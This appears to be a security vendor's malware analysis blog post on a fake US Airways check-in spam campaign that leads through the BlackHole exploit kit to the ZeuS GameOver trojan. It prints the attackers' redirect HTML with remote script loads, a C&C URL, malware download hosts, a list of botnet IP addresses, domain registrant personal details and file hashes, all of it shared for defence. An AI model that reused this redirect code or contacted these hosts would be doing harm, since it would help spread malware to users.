A gift from ZeuS for passengers of US Airways

Spam

On 20 March, we detected a spam campaign targeting passengers of US Airways. Almost the entire week cybercriminals were sending users the following email allegedly from US Airways:

There is a brief description of the check-in procedure and a confirmation code is provided for online reservation.

The criminals are obviously banking on any recipients flying on the flight mentioned in the email clicking on the link "Online reservation details".

Different emails contained different links — for example, we noticed the following domains: sulichat.hu, prakash.clanteam.com, panvelkarrealtors.com.

After clicking the link a series of redirects eventually leads to a domain hosting BlackHole Exploit Kit.

BlackHole Exploit Kit: redirections and infection

A typical BlackHole infection routine is used to infect users’ computers.
The first port of call after clicking the link in the email is a page with the following html code:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://boemelparty.be/<removed>/js.js"></script>
<script type="text/javascript" src="http://nhb.prosixsoftron.in/<removed>/js.js"></script>
<script type="text/javascript" src="http://sas.hg.pl/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.vinhthanh.com.vn/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.alpine-turkey.com/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.thedugoutdawgs.com/<removed>/js.js"></script>
</html>

As a result, javascripts are loaded into the user’s browser from different domains. The javascripts contain a single command such as: document.location='http://indigocellular.com/'. This command redirects the user to a page containing another, obfuscated, javascript.

This javascript’s job is to insert links into the html code of the page that then lead to the object with the exploit. So far, we’ve detected three types of objects: a JAR file, SWF file and a PDF document. Each object exploits a vulnerability in the respective application – Java, Flash Player or Adobe Reader — to execute malicious code in the targeted system. If a vulnerable version of even one of those applications is being used, the attack ends in infection – the malicious executable is loaded and run in the user’s system.

Malicious JAR, SWF and PDF documents are loaded from different domains — e.g. indigocellular.com, browncellular.com, bronzecellular.com (domains info) — under the names Qai.jar, field.swf, dea86.pdf, 11591.pdf.

We detect these exploits as:
Exploit.Java.CVE-2011-3544.mz
Exploit.SWF.Agent.gd
Exploit.JS.Pdfka.fof

After successfully exploiting vulnerabilities, an executable file is downloaded from the same domains where the exploits are located. It can be downloaded under different names — about.exe, contacts.exe and others — and is essentially a downloader. When the downloader runs, it connects to its C&C at the URL “176.28.18.135/pony/gate.php”, and downloads and runs another malicious program – ZeuS/ZBot or, to be more precise, a modification of one of the development branches of that Trojan known as ‘GameOver’ – on the user’s system.

ZeuS is downloaded from hacked sites such as:
cinecolor.com.ar
bizsizanayasaolmaz.org
cyrpainting.cl
hellenic-antiaging-academy.gr
elektro-pfeffer.at
grupozear.es
sjasset.com

Polymorphism

At all the stages of this attack, every object — domains, links to javascripts, files with exploits, the downloader and ZeuS — was frequently replaced with a new one. The domains remained "alive" for nearly 12 hours, while the ZeuS samples were replaced more often.

During the short periods of time (a few hours over several days) that I was monitoring what files were being downloaded, I managed to detect 6 modifications of the downloader and 3 modifications of ZeuS.

To recap, a modification includes all the samples that are detected with the same verdict, hence number of detected programs is usually bigger than the number of verdicts.

Downloader verdicts:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx
Trojan-PSW.Win32.Fareit.oo
Trojan-PSW.Win32.Fareit.pb
Trojan.Win32.Jorik.Downloader.ams

Total number of programs detected with these verdicts: 250.

ZeuS verdicts:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx

Total number of samples detected with these verdicts: 127.

As I have already mentioned, these were only the verdicts I managed to record. There were undoubtedly more modifications throughout the course of this particular spam campaign.

Botnet identificators

It wasn’t just the ZeuS wrapper that was being changed (packer, anti-emulation), the malicious program itself was being recompiled. ZeuS contains a hardcoded botnet ID string and some IP addresses which the malicious program tries to connect to following infection. Those data were modified over time as well. According to the numbers of detected and analyzed samples, we can assume that ZeuS was being recompiled at every second repacking.

Having analyzed 48 versions of the different modifications of ZeuS that were used by cybercriminals in this attack, I discovered 19 unique botnet identificators:

chinz22 chinz24 blk25 mmz22 mmz24 mmz25
molotz25 NR22 NR23 NR24 NR25 ppcz22
ppcz23 ppcz24 rnato25 rubz22 rubz23 rubz24
zuu

In contrast to the conventional ZeuS program which usually contains a single URL to download a configuration file, each sample of GameOver has 20 hardcoded IP addresses with ports. Having infected the victim’s computer, GameOver tries to establish a connection to those addresses in order to inform a botnet about itself, retrieve information (e.g. web injects), send data stolen from the victim.

Of the 960 IP addresses contained in the 48 analyzed samples, just 157 of them are unique:

+Open list of IP addresses

109.86.20.192:25071 111.252.183.142:22376 114.149.70.68:11807 114.41.42.83:23061 114.47.174.132:25602
116.68.106.249:17051 116.74.63.215:28397 117.197.130.195:17253 117.200.28.128:26895 121.96.154.99:18978
122.120.6.124:22322 122.26.48.225:25178 123.231.81.178:20129 124.13.56.101:15582 125.25.55.156:20834
140.130.36.32:13590 143.90.182.68:15121 151.40.222.25:19197 161.24.7.83:28740 165.228.237.204:17223
173.11.33.57:28198 175.141.221.126:24400 177.17.3.94:14470 177.41.72.204:19922 177.42.233.93:13577
177.42.26.217:14084 178.121.5.147:22245 178.156.170.215:14697 180.234.242.6:12692 186.122.42.176:21468
186.146.109.235:28038 186.169.207.31:25267 186.206.85.241:29592 186.212.252.139:26376 186.61.97.233:18271
187.21.121.179:29597 187.52.165.241:25003 187.59.156.215:23810 187.78.48.90:28054 188.24.177.174:20670
188.24.183.30:20670 188.24.42.247:29919 188.24.91.76:18603 188.24.94.127:18603 188.25.32.93:18509
188.26.246.185:21181 188.27.192.140:10991 188.27.77.6:14351 189.103.58.227:15863 189.106.203.3:22619
189.113.210.69:16075 189.58.63.42:23810 190.11.42.132:16838 190.183.196.38:27445 190.200.120.150:17663
190.201.27.240:12618 190.231.254.101:11271 190.26.120.90:22952 2.40.249.44:23266 200.109.42.212:25890
200.126.164.122:25565 200.84.130.185:29346 201.145.184.97:25585 201.173.212.122:25493 201.21.14.224:19004
201.58.108.117:19986 201.58.79.254:19986 202.149.67.164:26124 206.219.64.130:21401 208.180.223.27:12046
213.163.112.183:22254 213.164.225.186:25619 216.187.184.34:28333 218.170.36.242:13286 218.170.42.95:13286
221.133.18.131:12492 222.124.55.128:29563 24.154.22.50:13524 27.119.46.174:22985 27.4.113.69:27664
41.102.165.37:29870 41.252.115.102:25734 46.197.66.43:29879 49.128.175.94:24566 50.129.124.49:28454
60.246.131.173:23424 61.78.79.8:16362 66.193.204.141:26171 68.127.16.166:22762 68.150.204.237:16150
71.11.205.72:23114 72.185.157.254:29727 72.199.188.132:25142 72.64.43.86:21316 75.108.18.26:21332
75.127.204.90:10945 75.35.88.121:26277 76.185.32.7:18942 77.254.230.170:15741 78.166.182.155:12114
78.61.173.28:22352 78.62.246.91:16094 78.87.143.67:21277 79.112.219.78:13525 79.112.231.138:13644
79.113.104.28:29098 79.113.104.97:29098 79.115.143.244:16824 79.115.226.238:14247 79.116.121.163:14751
79.116.28.147:27683 79.117.177.174:12523 79.118.247.63:14481 79.38.117.69:18242 79.39.241.147:29216
79.47.239.67:28246 81.0.94.178:27735 81.214.253.235:13820 81.64.159.213:22322 81.65.125.102:24715
82.131.113.220:15271 82.131.141.80:27735 82.211.174.146:25219 82.88.65.111:17345 83.228.43.66:11167
83.4.30.245:21628 84.232.253.30:19202 84.32.66.38:25067 85.110.206.175:22346 85.250.176.250:15494
86.121.16.63:27337 86.124.108.93:20225 87.126.224.174:11314 87.207.108.163:14491 87.24.128.66:14935
88.235.4.104:22459 88.250.42.18:14086 89.120.100.121:19228 89.136.130.155:22321 89.137.18.224:21326
91.127.173.36:10734 91.179.41.185:15941 91.179.41.185:24693 92.241.134.103:26870 94.122.71.97:11842
94.203.147.11:20599 94.39.240.218:14338 94.53.198.35:24596 94.66.81.228:15663 95.104.111.141:11838
95.226.45.198:18846 95.56.143.17:23352 95.9.163.52:24483 97.78.7.0:10159 99.169.224.231:22266
99.190.137.80:12109 99.7.203.52:18700

Attack geography

I presume that during this time spam emails with links to confirm US Airways flight reservations were not the only method used to spread ZeuS. Cybercriminals are nothing if not original. And even though this is not the first time they’ve used a flight-related trick, it’s the first time this particular kind of spam has been detected. If the recipients belong to a target audience, they are much more likely to click on a malicious link in an email. However, the majority of users who received these emails were not flying anywhere that day, which is why very few fell for the scam.

Obviously, for the period under review other spam emails were being sent including links that led to the same sites, the same exploits and the same malicious executable files mentioned above. I took a look at where the threats that were related in some way or another to this attack were detected by our users. Below you can see a geographical breakdown of the detected exploits, downloaders and ZeuS modifications used by the cybercriminals in this attack:

Russia 32.8%
USA 10.3%
Italy 9.2%
Germany 8.6%
India 6.9%
France 3.8%
Ukraine 3.6%
Poland 3.2%
Brazil 3.1%
Malaysia 3%
Spain 2.9%
China 2.7%

P.S. Here’s some information about the domains being used in the spam campaign described above
(it’s not the first time these registration details have been used to register other domains that participate in propagating malicious software via spam):

indigocellular.com 209.59.218.102
Registrant: Nicholas Guzzardi, clarelam@primasia.com
5536 Gold Rush Dr.NW
87120 Albuquerque
United States
Tel: +1.5053505497
browncellular.com 174.140.168.207
Registrant: Renee Fabian, clarelam@primasia.com
2840 Center Port Circle
Pompano Beach, FL 33064
US
bronzecellular.com 96.9.151.220
Registrant: Renee Fabian, clarelam@primasia.com
2840 Center Port Circle
Pompano Beach, FL 33064
US

Below you can find an excerpt of MD5-hashes of files

+Open list of MD5

Exploit.Java.CVE-2011-3544.mz Exploit.JS.Pdfka.fof Exploit.SWF.Agent.gd
892693dbc749510fe530269d707fdb34 2D13BCEF58B8E29C52AF1D29F2E81544 0c341dab17d221b19d707254097bd9c0
fb77c4c32297c460a786cb138768647e

Downloader ZeuS
0f7dc4fac417f2e5145d210ee5bc2129 02fbfc95c2f99490f9382ec704c1f1e5
102e6b401079b1be09bb47da9ee84bfe 081943d546a7364bfd7f3ae1360aa657
11b66c03801353c25c4bab7abd5f8588 1b83702cd12e4f8d48771ca1cbcaf034
0b95280b2ad4dff0daaf65d801df7535 2775cf95d5450bdb54cf537f35e8e504
0c720f41ecbcacf563630e0ac8739136 42de75c29dc058f14dab5fe94130a907
0c952e99a5014a2fd30c1c613ffb9671 432788a5e34a9be4989b3088eeec41ca
5e097d18a41035e73003d9e47adc232f 0299f2de435f6406ef8c5e51826d3e42
0b1165cfa99ae9383439e0c1a7e070fb 0f7664e04d4d62c4b4ad09b085109008
11a97068338efd774f744a9c4cd9afe7 46737ca337d178894532d570ad729089
4e44ca94f7682b7a8734025a05545a42 77e772b8d17d0ccd52be1fcbbdd71ee4
c94e90f9adc52e72c403ff79ea8b6cbc f6853b73db8a1e6105a0b2734974205e
73515909a2d6353714a5226577554688 ee80937bee1231f4223d98c4d4a56480

function showSpoiler()
{
var inner = document.getElementById ("tmpdiv");
var sp_a = document.getElementById ("spoiler_anchor");
if (inner.style.display == "none")
{
inner.style.display = "";
sp_a.innerHTML = "-Close list of IP addresses";
}
else
{
inner.style.display = "none";
sp_a.innerHTML = "+Open list of IP addresses";
}
}

function showSpoiler_md5()
{
var inner = document.getElementById ("tmpdiv_md5");
var sp_a = document.getElementById ("spoiler_anchor_md5");
if (inner.style.display == "none")
{
inner.style.display = "";
sp_a.innerHTML = "-Close list of MD5";
}
else
{
inner.style.display = "none";
sp_a.innerHTML = "+Open list of MD5";
}
}

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *